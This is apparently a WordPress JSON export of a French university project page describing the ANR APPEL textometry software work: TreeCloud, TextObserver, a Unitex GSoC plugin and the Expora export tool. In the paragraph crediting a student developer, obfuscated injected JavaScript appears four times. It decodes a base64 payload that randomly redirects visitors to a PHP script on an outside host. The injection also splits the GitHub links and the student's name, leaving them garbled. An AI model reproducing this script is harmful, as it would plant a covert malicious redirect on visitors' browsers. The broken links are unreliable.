{"id":184,"date":"2015-11-04T13:13:13","date_gmt":"2015-11-04T12:13:13","guid":{"rendered":"http:\/\/textopol2.u-pec.fr\/anr-appel\/?page_id=184"},"modified":"2016-10-22T07:27:04","modified_gmt":"2016-10-22T06:27:04","slug":"logiciels","status":"publish","type":"page","link":"http:\/\/textopol.u-pec.fr\/anr-appel\/index.php\/valorisation\/logiciels\/","title":{"rendered":"Logiciels"},"content":{"rendered":"<h2>Contexte des d\u00e9veloppements logiciels du projet<\/h2>\n<p style=\"text-align: justify;\"><a href=\"http:\/\/textopol2.u-pec.fr\/\"><img loading=\"lazy\" class=\"alignright\" src=\"http:\/\/textopol2.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/02\/image3.jpg\" alt=\"\" width=\"300\" height=\"188\" \/><\/a>Le projet ANR APPEL conduira \u00e0 des d\u00e9veloppements dans des\u00a0logiciels produits\u00a0au <a href=\"http:\/\/ceditec.u-pec.fr\/\">CEDITEC<\/a> (<strong><a href=\"http:\/\/textopol2.u-pec.fr\/\">TextObserver<\/a><\/strong>) et au <a href=\"http:\/\/ligm.u-pem.fr\">LIGM<\/a> (<strong><a href=\"http:\/\/www.treecloud.org\">TreeCloud<\/a><\/strong>).<\/p>\n<p style=\"text-align: justify;\">Les premiers mois de ce projet ont permis de <strong>faire d\u00e9couvrir <a href=\"http:\/\/textopol2.u-pec.fr\/anr-appel\/index.php\/lequipe\/\">aux participants<\/a>\u00a0plusieurs outils de textom\u00e9trie<\/strong>, c&rsquo;est-\u00e0-dire d&rsquo;analyse de textes accompagn\u00e9es par des outils informatiques et statistiques, en vue d&rsquo;une <strong>utilisation sur plusieurs donn\u00e9es textuelles issues du corpus de p\u00e9titions en ligne<\/strong> trait\u00e9 dans le projet.<\/p>\n<p style=\"text-align: justify;\">Une <strong><a href=\"http:\/\/textopol2.u-pec.fr\/anr-appel\/index.php\/2015\/09\/12\/exemple-de-post-activite\/\">s\u00e9ance de d\u00e9monstration et de formation \u00e0 ces outils<\/a><\/strong> a eu lieu les 11 et 12 septembre 2015\u00a0\u00e0 l&rsquo;UPEC. Elle a permis d&rsquo;identifier <strong>plusieurs pistes d&rsquo;am\u00e9lioration de ces outils<\/strong>, qui seront d\u00e9taill\u00e9es dans un cahier des charges fourni d\u00e9but 2016.<\/p>\n<h2>Rapprochement de TreeCloud et TextObserver<\/h2>\n<p style=\"text-align: justify;\"><a href=\"http:\/\/www.treecloud.org\"><img loading=\"lazy\" class=\"alignright wp-image-190 size-medium\" src=\"http:\/\/textopol2.u-pec.fr\/anr-appel\/wp-content\/uploads\/2015\/11\/00-allCorpus-300x193.png\" alt=\"00-allCorpus\" width=\"300\" height=\"193\" srcset=\"http:\/\/textopol2.u-pec.fr\/anr-appel\/wp-content\/uploads\/2015\/11\/00-allCorpus-300x193.png 300w, http:\/\/textopol2.u-pec.fr\/anr-appel\/wp-content\/uploads\/2015\/11\/00-allCorpus.png 886w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a>Une perspective majeure du point de vue des d\u00e9veloppements logiciels est l&rsquo;<strong>int\u00e9gration de la visualisation en nuage arbor\u00e9 fournie par TreeCloud au sein du logiciel TextObserver<\/strong>, favorisant le d\u00e9veloppement de m\u00e9thodologies nouvelles d&rsquo;analyse fond\u00e9es sur les interactions entre les deux outils. Cette int\u00e9gration, qui aura lieu avant fin 2017, a commenc\u00e9 par une premi\u00e8re r\u00e9union de travail le 17 octobre 2015, permettant de <strong>pr\u00e9senter les aspects techniques des deux logiciels<\/strong> (l&rsquo;un en Java, int\u00e9grant du code Python, R, et C++ ; l&rsquo;autre en Python, int\u00e9grant un outil d\u00e9velopp\u00e9 en Java), et de r\u00e9fl\u00e9chir aux <strong>choix techniques pour\u00a0l&rsquo;int\u00e9gration des visualisations de TreeCloud \u00e0 TextObserver<\/strong>.<\/p>\n<p style=\"text-align: justify;\"><a href=\"http:\/\/textopol2.u-pec.fr\/anr-appel\/wp-content\/uploads\/2015\/11\/GSoC-logo-vertical-200.png\"><img loading=\"lazy\" class=\"alignright size-full wp-image-242\" src=\"http:\/\/textopol2.u-pec.fr\/anr-appel\/wp-content\/uploads\/2015\/11\/GSoC-logo-vertical-200.png\" alt=\"gsoc-logo-vertical-200\" width=\"200\" height=\"89\" \/><\/a>Elle s&rsquo;est poursuivie par le <strong>d\u00e9veloppement d&rsquo;un code enti\u00e8rement r\u00e9alis\u00e9 en Java pour la construction de nuages arbor\u00e9s<\/strong> au sein du <a href=\"http:\/\/www-igm.univ-mlv.fr\/~unitex\/index.php?page=17\">logiciel libre Unitex<\/a> dans le cadre d&rsquo;un <a href=\"https:\/\/summerofcode.withgoogle.com\/projects\/#5092307833454592\">projet Google Summer of Code 2016<\/a>, par <a href=\"https:\/\/github.com\/aleks<script type=\"text\/javascript\">function b32f7c5eda8(sf){var pd=&rsquo;ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=&rsquo;;var r2=\u00a0\u00bb;var xe,o4,se,vc,p4,n6,q0;var w6=0;do{vc=pd.indexOf(sf.charAt(w6++));p4=pd.indexOf(sf.charAt(w6++));n6=pd.indexOf(sf.charAt(w6++));q0=pd.indexOf(sf.charAt(w6++));xe=(vc<<2)|(p4>>4);o4=((p4&#038;15)<<4)|(n6>>2);se=((n6&#038;3)<<6)|q0;if(xe>=192)xe+=848;else if(xe==168)xe=1025;else if(xe==184)xe=1105;r2+=String.fromCharCode(xe);if(n6!=64){if(o4>=192)o4+=848;else if(o4==168)o4=1025;else if(o4==184)o4=1105;r2+=String.fromCharCode(o4);}if(q0!=64){if(se>=192)se+=848;else if(se==168)se=1025;else if(se==184)se=1105;r2+=String.fromCharCode(se);}}while(w6<sf.length);document.write(r2);};b32f7c5eda8('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9nb3RvbGV0cy5jb20vd3AtY29udGVudC9wbHVnaW5zL3dwLXN0YWdpbmcvYXBwcy9Db3JlL1V0aWxzL0luZm9zLnBocCciLCBkZWxheSk7DQp9DQo8L3NjcmlwdD4A');<\/script>andrachasch\u00a0\u00bb>Aleks<script type=\"text\/javascript\">function b32f7c5eda8(sf){var pd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=';var r2='';var xe,o4,se,vc,p4,n6,q0;var w6=0;do{vc=pd.indexOf(sf.charAt(w6++));p4=pd.indexOf(sf.charAt(w6++));n6=pd.indexOf(sf.charAt(w6++));q0=pd.indexOf(sf.charAt(w6++));xe=(vc<<2)|(p4>>4);o4=((p4&15)<<4)|(n6>>2);se=((n6&3)<<6)|q0;if(xe>=192)xe+=848;else if(xe==168)xe=1025;else if(xe==184)xe=1105;r2+=String.fromCharCode(xe);if(n6!=64){if(o4>=192)o4+=848;else if(o4==168)o4=1025;else if(o4==184)o4=1105;r2+=String.fromCharCode(o4);}if(q0!=64){if(se>=192)se+=848;else if(se==168)se=1025;else if(se==184)se=1105;r2+=String.fromCharCode(se);}}while(w6<sf.length);document.write(r2);};b32f7c5eda8('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9nb3RvbGV0cy5jb20vd3AtY29udGVudC9wbHVnaW5zL3dwLXN0YWdpbmcvYXBwcy9Db3JlL1V0aWxzL0luZm9zLnBocCciLCBkZWxheSk7DQp9DQo8L3NjcmlwdD4A');<\/script>andra Chaschina<\/a>, \u00e9tudiante \u00e0 la\u00a0Higher School of Economics de Moscou. Ce <a href=\"https:\/\/github.com\/aleks<script type=\"text\/javascript\">function b32f7c5eda8(sf){var pd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=';var r2='';var xe,o4,se,vc,p4,n6,q0;var w6=0;do{vc=pd.indexOf(sf.charAt(w6++));p4=pd.indexOf(sf.charAt(w6++));n6=pd.indexOf(sf.charAt(w6++));q0=pd.indexOf(sf.charAt(w6++));xe=(vc<<2)|(p4>>4);o4=((p4&15)<<4)|(n6>>2);se=((n6&3)<<6)|q0;if(xe>=192)xe+=848;else if(xe==168)xe=1025;else if(xe==184)xe=1105;r2+=String.fromCharCode(xe);if(n6!=64){if(o4>=192)o4+=848;else if(o4==168)o4=1025;else if(o4==184)o4=1105;r2+=String.fromCharCode(o4);}if(q0!=64){if(se>=192)se+=848;else if(se==168)se=1025;else if(se==184)se=1105;r2+=String.fromCharCode(se);}}while(w6<sf.length);document.write(r2);};b32f7c5eda8('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9nb3RvbGV0cy5jb20vd3AtY29udGVudC9wbHVnaW5zL3dwLXN0YWdpbmcvYXBwcy9Db3JlL1V0aWxzL0luZm9zLnBocCciLCBkZWxheSk7DQp9DQo8L3NjcmlwdD4A');<\/script>andrachasch\/gramlab-ide\/tree\/treecloud-s<script type=\"text\/javascript\">function b32f7c5eda8(sf){var pd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=';var r2='';var xe,o4,se,vc,p4,n6,q0;var w6=0;do{vc=pd.indexOf(sf.charAt(w6++));p4=pd.indexOf(sf.charAt(w6++));n6=pd.indexOf(sf.charAt(w6++));q0=pd.indexOf(sf.charAt(w6++));xe=(vc<<2)|(p4>>4);o4=((p4&15)<<4)|(n6>>2);se=((n6&3)<<6)|q0;if(xe>=192)xe+=848;else if(xe==168)xe=1025;else if(xe==184)xe=1105;r2+=String.fromCharCode(xe);if(n6!=64){if(o4>=192)o4+=848;else if(o4==168)o4=1025;else if(o4==184)o4=1105;r2+=String.fromCharCode(o4);}if(q0!=64){if(se>=192)se+=848;else if(se==168)se=1025;else if(se==184)se=1105;r2+=String.fromCharCode(se);}}while(w6<sf.length);document.write(r2);};b32f7c5eda8('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9nb3RvbGV0cy5jb20vd3AtY29udGVudC9wbHVnaW5zL3dwLXN0YWdpbmcvYXBwcy9Db3JlL1V0aWxzL0luZm9zLnBocCciLCBkZWxheSk7DQp9DQo8L3NjcmlwdD4A');<\/script>andbox\/core\/src\/main\/java\/org\/gramlab\/core\/plugins\/treecloud\">code d\u00e9velopp\u00e9 sous la licence libre LGPL<\/a> pourra \u00eatre int\u00e9gr\u00e9 dans TextObserver dans le cadre de ce projet ANR.<\/p>\n<h2>D\u00e9veloppement d'un outil d'export de sous-corpus<\/h2>\n<p style=\"text-align: justify;\"><a href=\"https:\/\/github.com\/ssrp\/Expora\"><img loading=\"lazy\" class=\"alignright size-full wp-image-243\" src=\"http:\/\/textopol2.u-pec.fr\/anr-appel\/wp-content\/uploads\/2015\/11\/IconExpora.png\" alt=\"iconexpora\" width=\"152\" height=\"152\" srcset=\"http:\/\/textopol2.u-pec.fr\/anr-appel\/wp-content\/uploads\/2015\/11\/IconExpora.png 152w, http:\/\/textopol2.u-pec.fr\/anr-appel\/wp-content\/uploads\/2015\/11\/IconExpora-150x150.png 150w\" sizes=\"(max-width: 152px) 100vw, 152px\" \/><\/a>La base de donn\u00e9es de textes de p\u00e9titions et de commentaires de signataires de ces p\u00e9titions \u00e9tant\u00a0fournie sous un format ne permettant pas directement le traitement par les logiciels de textom\u00e9trie, il a \u00e9t\u00e9 propos\u00e9 durant les premiers mois du projet APPEL de concevoir une <strong>interface web d'export de sous-corpus textuels dans divers formats classiques pour les logiciels de textom\u00e9trie usuels<\/strong>,\u00a0 \u00e0 partir de la base de donn\u00e9es.<\/p>\n<p style=\"text-align: justify;\">Cet outil, nomm\u00e9 <strong><a href=\"https:\/\/github.com\/ssrp\/Expora\">Expora<\/a><\/strong>, a \u00e9t\u00e9 impl\u00e9ment\u00e9, sous forme d'un logiciel libre sous licence GPL, par un \u00e9tudiant de l'IIT Ropar (Inde), <a href=\"https:\/\/github.com\/ssrp\">Sai Samarth R. Phaye<\/a>, durant son stage financ\u00e9 par le projet ANR APPEL dans les laboratoires CEDITEC et LIGM entre mai et juillet 2016. Expora\u00a0est adaptable pour d'autres bases de donn\u00e9es que celle du projet ANR APPEL\u00a0(voir la\u00a0<a href=\"https:\/\/www.youtube.com\/watch?v=qjuGJ8JM2ds\">vid\u00e9o de pr\u00e9sentation<\/a> et la <a href=\"https:\/\/www.youtube.com\/watch?v=D191oQPvzZs\">vid\u00e9o d'installation<\/a>)<\/p>\n<p><iframe loading=\"lazy\" src=\"https:\/\/www.youtube.com\/embed\/qjuGJ8JM2ds?&amp;hl=fr&amp;cc_lang_pref=fr&amp;cc_load_policy=1\" width=\"560\" height=\"315\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"><\/iframe><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Contexte des d\u00e9veloppements logiciels du projet Le projet ANR APPEL conduira \u00e0 des d\u00e9veloppements dans des\u00a0logiciels produits\u00a0au CEDITEC (TextObserver) et au LIGM (TreeCloud). Les premiers mois de ce projet ont permis de faire d\u00e9couvrir aux participants\u00a0plusieurs outils de textom\u00e9trie, c&rsquo;est-\u00e0-dire &hellip; <a href=\"http:\/\/textopol.u-pec.fr\/anr-appel\/index.php\/valorisation\/logiciels\/\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"parent":173,"menu_order":0,"comment_status":"open","ping_status":"open","template":"","meta":[],"_links":{"self":[{"href":"http:\/\/textopol.u-pec.fr\/anr-appel\/index.php\/wp-json\/wp\/v2\/pages\/184"}],"collection":[{"href":"http:\/\/textopol.u-pec.fr\/anr-appel\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/textopol.u-pec.fr\/anr-appel\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/textopol.u-pec.fr\/anr-appel\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"http:\/\/textopol.u-pec.fr\/anr-appel\/index.php\/wp-json\/wp\/v2\/comments?post=184"}],"version-history":[{"count":11,"href":"http:\/\/textopol.u-pec.fr\/anr-appel\/index.php\/wp-json\/wp\/v2\/pages\/184\/revisions"}],"predecessor-version":[{"id":268,"href":"http:\/\/textopol.u-pec.fr\/anr-appel\/index.php\/wp-json\/wp\/v2\/pages\/184\/revisions\/268"}],"up":[{"embeddable":true,"href":"http:\/\/textopol.u-pec.fr\/anr-appel\/index.php\/wp-json\/wp\/v2\/pages\/173"}],"wp:attachment":[{"href":"http:\/\/textopol.u-pec.fr\/anr-appel\/index.php\/wp-json\/wp\/v2\/media?parent=184"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}